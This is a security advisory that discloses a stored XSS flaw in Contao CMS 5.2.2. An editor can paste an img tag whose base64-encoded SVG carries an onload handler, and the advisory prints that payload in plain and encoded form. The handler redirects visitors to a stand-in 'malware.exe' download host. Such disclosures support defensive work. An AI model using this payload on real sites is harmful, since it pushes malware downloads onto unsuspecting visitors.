Contao CMS | XSS via base64 encoded img tag
Information
| Software Type | Web App |
|---|---|
| Software Name | Contao CMS |
| Affected Version | 5.2.2 |
| Software Vendor | Contao CMS |
| Software Link | https://github.com/contao/contao |
| Severity | Medium |
| CVSS Score | 6.8 |
| CVE Link | N/A |
| Affected Assets | 84092+ |
| Date of Discovery | March 10th, 2025 |
| PoC Exploit | N/A |
Description
In Contao, any editor can edit contents of an article. Despite the fact that there are filters in place to protect against JavaScript and only a certain number of HTML tags are allowed, we can still bypass these protections by using an img tag and loading a base64 encoded SVG image.
Reproduce
Login as an editor and navigate to /contao?do=article and pick an article for editing. In my case I picked the following article for editing:
/contao?do=article&table=tl_content&id=73
In my case, I could visit this article without being logged in through the following page:
This widens the attack to other users who visit articles. Encode the following payload into base64:
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" onload="window.location.href='http://127.0.0.1:8000/malware.exe';"><rect width="200" height="200" fill="lightblue" /></svg>
Base64 encoded:
PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyMDAiIGhlaWdodD0iMjAwIiBvbmxvYWQ9IndpbmRvdy5sb2NhdGlvbi5ocmVmPSdodHRwOi8vMTI3LjAuMC4xOjgwMDAvbWFsd2FyZS5leGUnOyI+PHJlY3Qgd2lkdGg9IjIwMCIgaGVpZ2h0PSIyMDAiIGZpbGw9ImxpZ2h0Ymx1ZSIgLz48L3N2Zz4=
Create payload with img tag:
<img src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyMDAiIGhlaWdodD0iMjAwIiBvbmxvYWQ9IndpbmRvdy5sb2NhdGlvbi5ocmVmPSdodHRwOi8vMTI3LjAuMC4xOjgwMDAvbWFsd2FyZS5leGUnOyI+PHJlY3Qgd2lkdGg9IjIwMCIgaGVpZ2h0PSIyMDAiIGZpbGw9ImxpZ2h0Ymx1ZSIgLz48L3N2Zz4=" alt="XSS">
Edit the article's source code by clicking <> tag on top of the editor and paste the payload in there.
Proof of Concept (PoC) Video
Posted on: May 24, 2025 04:10 AM